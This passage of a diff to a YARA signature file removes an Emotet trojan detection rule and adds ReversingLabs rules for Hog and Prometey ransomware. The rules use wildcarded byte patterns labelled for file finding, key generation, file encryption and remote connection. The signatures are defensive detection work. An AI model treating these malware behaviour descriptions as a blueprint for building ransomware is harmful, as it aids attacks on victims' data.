+            ?? ?? 8B 75 ?? 8B 7D ?? 83 4D ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? C3 03 45 ?? 56 6A ?? 8D 4D ?? 51 50 FF 75 ?? 50 6A ?? 6A ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 45 ?? 40
+            89 45 ?? 3B 45 ?? 75 ?? 8B 75 ?? FF 76 ?? FF 76 ?? 8B 45 ?? 03 45 ?? 03 45 ?? 50 E8
+            ?? ?? ?? ?? FF 76 ?? FF 76 ?? 8B 46 ?? 03 45 ?? 03 45 ?? 03 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 7E ?? 03 7E ?? 03 7D ?? 03 7D ?? 8B 45 ?? 03 F8 8D 75 ?? A5 A5 A5 A5 6A
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 F6 46 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 4D
+            ?? 8B 55 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 8B 35 ?? ?? ?? ?? FF D6
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $delete_shadow_copies_p* ) ) and ( all of ( $destroy_files_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $create_key ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Hog : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Emotet trojan."
+		description = "Yara rule that detects Hog ransomware."
 		author = "ReversingLabs"
-		id = "9742743d-753a-582b-9701-7278c8ed0e4e"
-		date = "2020-06-26"
-		modified = "2021-11-16"
+		id = "b4f26acf-5ff1-5c49-8cfa-8f619af84efd"
+		date = "2021-10-12"
+		modified = "2021-10-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.Emotet.yara#L1-L182"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Hog.yara#L1-L70"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "747d603c9849a66782c95050a4a634ffdb4ce2882adcfc5d63e1f1ea1651b25e"
+		logic_hash = "c5cbc79fee9083ed3befa6b0d348f2d38064bb9012b8f0ca11afd7137243866d"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "Emotet"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Hog"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$decrypt_resource_v1 = {
-            55 8B EC 83 EC ?? 53 8B D9 8B C2 56 57 89 45 ?? 8B 3B 33 F8 8B C7 89 7D ?? 83 E0 ??
-            75 ?? 8D 77 ?? EB ?? 8B F7 2B F0 83 C6 ?? 8D 0C 36 E8 ?? ?? ?? ?? 8B D0 89 55 ?? 85
-            D2 74 ?? 83 65 ?? ?? 8D 43 ?? 83 65 ?? ?? C1 EE ?? 8D 0C B0 8B F2 8B D9 2B D8 83 C3
-            ?? C1 EB ?? 3B C1 0F 47 5D ?? 85 DB 74 ?? 8B 55 ?? 8B F8 8B 0F 8D 7F ?? 33 CA 0F B6
-            C1 66 89 06 8B C1 C1 E8 ?? 8D 76 ?? 0F B6 C0 66 89 46 ?? C1 E9 ?? 0F B6 C1 66 89 46
-            ?? C1 E9 ?? 0F B6 C1 66 89 46 ?? 8B 45 ?? 40 89 45 ?? 3B C3 72 ?? 8B 7D ?? 8B 55 ??
-            33 C0 66 89 04 7A 5F 5E 8B C2 5B 8B E5 5D C3
-        }
-		$generate_filename_v1 = {
-            56 57 33 C0 BF ?? ?? ?? ?? 57 50 50 6A ?? 50 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 83 C4 ?? 8B CE 5F 5E E9
+		$generate_key = {
+            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08
+            16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ??
+            07 6F ?? ?? ?? ?? DC 11 ?? 2A
         }
-		$decrypt_resource_v2 = {
-            55 8B EC 83 EC ?? 8B 41 ?? 8B 11 33 C2 53 56 8D 71 ?? 89 55 ?? 8D 58 ?? 89 45 ?? 83
-            C6 ?? F6 C3 ?? 74 ?? 83 E3 ?? 83 C3 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
-            8B C8 E8 ?? ?? ?? ?? FF D0 8D 14 1B B9 ?? ?? ?? ?? 52 6A ?? 50 E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 89 45 ?? 85 C0 74 ?? C1 EB ?? 8B C8 57 33 C0 8D
-            14 9E 33 DB 8B FA 2B FE 83 C7 ?? C1 EF ?? 3B F2 0F 47 F8 85 FF 74 ?? 8B 16 8D 49 ??
-            33 55 ?? 8D 76 ?? 0F B6 C2 43 66 89 41 ?? 8B C2 C1 E8 ?? 0F B6 C0 66 89 41 ?? C1 EA
-            ?? 0F B6 C2 66 89 41 ?? C1 EA ?? 0F B6 C2 66 89 41 ?? 3B DF 72 ?? 8B 45 ?? 33 D2 8B
-            4D ?? 5F 66 89 14 41 8B C1 5E 5B 8B E5 5D C3
+		$find_files = {
+            16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ??
+            ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C
+            2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ??
+            ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ??
+            DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A
         }
-		$generate_filename_v2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 51 6A ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 85 C0 0F 88 ?? ?? ?? ?? 56
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 8D [1-5] 51
-            51 50 56 8D [1-5] 68 ?? ?? ?? ?? 51 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            C8 E8 ?? ?? ?? ?? FF D0 83 C4 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8
-            E8 ?? ?? ?? ?? FF D0 56 6A ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8
-            E8 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 5E 8B E5 5D C3 33 C0 8B E5 5D C3
-        }
-		$decrypt_resource_v3 = {
-            56 8B F1 BA [6-9] B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 56 6A ?? 50 68 ?? ?? ?? ??
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 5E C3
-        }
-		$generate_filename_v3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F1 8B FA 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BB ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B D3 56 50 BE ?? ?? ?? ?? [2-5] 8B CE E8 ??
-            ?? ?? ?? 59 FF D0 57 8D 85 ?? ?? ?? ?? 8B D3 50 [2-5] 8B CE E8 ?? ?? ?? ?? 59 FF D0
-            8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 59 FF D0 F7 D8 5F 1B C0 5E 40 5B 8B E5 5D C3
+		$encrypt_files_p1 = {
+            02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19
+            73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ??
+            ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ??
+            07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ??
+            ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ??
+            ?? ?? ?? DE ?? 26 DE ?? 2A
         }
-		$decrypt_resource_v4 = {
-            56 57 8B FA E8 ?? ?? ?? ?? 8B F0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 8B 0D ?? ?? ?? ??
-            89 44 B9 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
-            8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF D0 8B F8 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 57
-            FF D0 5F 5E C3
+		$encrypt_files_p2 = {
+            73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ??
+            ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B
+            73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ??
+            ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ??
+            ?? DC 26 DE ?? 02 2A 11 ?? 2A
         }
-		$generate_filename_snippet_v4 = {
-            A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 56 53 FF D0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 5F 5E 33 C9 8D
-            04 43 66 89 08 5D 5B 59 C3
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) )
+}
+rule REVERSINGLABS_Win32_Ransomware_Prometey : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects Prometey ransomware."
+		author = "ReversingLabs"
+		id = "a5902fc6-2752-520f-be84-df9ea7b1e27d"
+		date = "2021-06-07"
+		modified = "2021-06-07"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Prometey.yara#L1-L156"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "f14c9605e2d375176b461fd396be66754b0ace7dcaada8ca33ad86f6eda10b73"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Prometey"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$remote_connection_p1 = {
+            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
+            ?? ?? ?? ?? 6A ?? 5E 8D 85 ?? ?? ?? ?? 89 75 ?? 50 BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B 8D 4D ?? 88 5D ?? E8 ?? ??
+            ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
+            C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 33 DB 53 53 53 53 50 88 5D
         }
-		$decrypt_resource_snippet_v5 = {
-            C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0
-            85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89 02 8B C1 C1 E8 ?? 8D 52
-            ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89 42 ?? 0F B6 C1 66 89 42
-            ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43 5F 5E 8B C3 5B 83 C4 ??
-            C3
+		$remote_connection_p2 = {
+            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 53 56 53 53 6A ?? 68 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 DB 74 ?? 6A ?? 68 ?? ?? ?? ??
+            33 C0 50 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ??
+            33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF 75 ?? FF D7 80 7D ?? ?? 74 ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D
+            ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? E8
         }
-		$decrypt_resource_snippet_v6 = {
-            C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0
-            85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 88 0A 8B C1 C1 E8 ?? 8D 52 ?? C1 E9 ??
-            88 42 ?? 88 4A ?? C1 E9 ?? 45 88 4A ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 5D C6 04
-            03 ?? 5F 5E 8B C3 5B 83 C4 ?? C3
+		$find_files_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D 4D ?? 8B D3 C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ??
+            ?? 33 C0 8D 7D ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ??
+            ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A
+            ?? 8B 7A ?? 2B CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B
+            12 57 52 51 8B CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D
+            ?? 51 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 7D
+            ?? 8B 9D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 0F 43 7D ?? 89 8D ??
+            ?? ?? ?? 3B D8 77 ?? 85 DB 75 ?? 8B F3 EB ?? 0F BE 09 2B C3 40 89 8D ?? ?? ?? ?? 03
         }
-		$liblzf_decompression_1 = {
-            83 EC ?? 8B 44 24 ?? 53 55 8D 2C 11 89 4C 24 ?? 8B 54 24 ?? 33 DB 03 C2 89 6C 24 ??
-            56 89 44 24 ?? 0F B6 41 ?? 8D 72 ?? 0F B6 11 C1 E2 ?? 0B D0 8D 45 ?? 89 44 24 ?? 57
-            8B F9 3B C8 0F 83 ?? ?? ?? ?? 0F B6 47 ?? C1 E2 ?? 0B D0 6B C2 ?? 8B CA C1 E9 ?? 33
-            CA 89 54 24 ?? 8B 54 24 ?? C1 E9 ?? 2B C8 8B 44 24 ?? 81 E1 ?? ?? ?? ?? 8B 2C 88 8B
-            C7 2B 44 24 ?? 03 6C 24 ?? 89 04 8A 8B C7 8B 54 24 ?? 2B C5 48 89 44 24 ?? 3D ?? ??
-            ?? ?? 0F 8D ?? ?? ?? ?? 3B EA 0F 86 ?? ?? ?? ?? 8A 45 ?? 3A 47 ?? 0F 85 ?? ?? ?? ??
-            0F B6 55 ?? 8D 4F ?? 0F B6 45 ?? 89 4C 24 ?? 0F B6 09 C1 E2 ?? 0B D0 C1 E1 ?? 0F B6
-            07 0B C8 3B D1 0F 85 ?? ?? ?? ?? 8B 44 24 ?? B9 ?? ?? ?? ?? 2B C7 3B C1 6A ?? 0F 47
-            C1 89 44 24 ?? 8D 46 ?? 5A 3B 44 24 ?? 72 ?? 33 C9 8B C6 85 DB 0F 94 C1 2B C1 83 C0
-            ?? 3B 44 24 ?? 0F 83 ?? ?? ?? ?? 8B C6 8D 4B ?? 2B C3 88 48 ?? 33 C0 85 DB 8B 5C 24
-            ?? 0F 94 C0 2B F0 83 FB ?? 0F 86 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ??
-            ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85
-            ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47
+		$find_files_p2 = {
+            C7 89 85 ?? ?? ?? ?? 2B C7 50 51 57 EB ?? 53 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 46 2B C6 50 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            8B F0 83 C4 ?? 85 F6 75 ?? 83 CE ?? 33 DB 56 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 89 5D ?? 50 8D 4D ?? 89 5D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 7D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 7D ?? 85 D2 74 ??
+            83 C9 ?? 8D 42 ?? 3B C1 0F 42 C8 03 CF EB ?? 2B F7 EB ?? 3B CF 74 ?? 49 80 39 ?? 75
+            ?? 2B CF EB ?? 83 C9 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 79 ?? 89 5D ?? C7 45 ?? ?? ??
+            ?? ?? 88 5D ?? 3B D7 0F 82 ?? ?? ?? ?? 2B D7 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83
+            7D ?? ?? 51 0F 43 45 ?? 8D 4D ?? 03 C7 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC
+            8D 45 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B 78 ?? 03 38 3B FB 7D ?? 81 FE ?? ?? ?? ?? 76 ?? 8D
         }
-		$liblzf_decompression_2 = {
-            0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A
-            47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45
